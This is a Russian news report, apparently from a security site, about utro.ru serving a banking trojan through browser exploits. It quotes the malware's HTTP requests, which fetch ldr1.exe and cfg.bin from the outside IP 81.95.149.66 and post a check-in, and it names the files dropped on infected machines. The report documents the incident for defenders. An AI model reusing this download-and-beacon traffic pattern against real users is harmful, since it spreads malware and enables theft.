Сайт utro.ru в течение нескольких часов распространял опасный троян

image

Сегодня во второй половине дня, пользователи, зашедшие на сайт utro.ru, увидели предупреждение антивируса о попытке заражения троянской программой, эксплуатирующей уязвимости в Internet Explorer и Mozilla Firefox.

Сегодня во второй половине дня, пользователи,  зашедшие на сайт utro.ru, увидели предупреждение антивируса о попытке заражения троянской программой, эксплуатирующей уязвимости в Internet Explorer и Mozilla Firefox.

При подробном изучении троян выполнял следующий запрос:

GET /e1/index.php HTTP/1.1\r\n
Referer: http://utro.ru/includes5/banners/advert_part.html/r/n
Host: 81.95.149.66\r\n


а дальше происходила загрузка бота:

GET /e1/file.php HTTP/1.1\r\n
GET /ldr1.exe HTTP/1.1\r\n
GET /cfg.bin HTTP/1.0\r\n
POST /s.php?1=april_002fdf3f&i= HTTP/1.0\r\n


В результате атаки, в корне диска с: появлялся файл 3.tmp, который детектируется большинством антивирусов как Trojan-Spy.Win32.Bancos.aam. В windows/system32 записывался файл ntos.exe , который также определялся как Trojan-Spy.Win32.Bancos.aam.

По информации из Лаборатории Касперского троян шифрует пользовательские данные на компьютере и предлагает купить расшифровщик. В случае отказа, грозится выложить приватные данные пользователя в сети интернет.

В результате атаки могли пострадать несколько десятков тысяч пользователей сайта.

comments powered by Disqus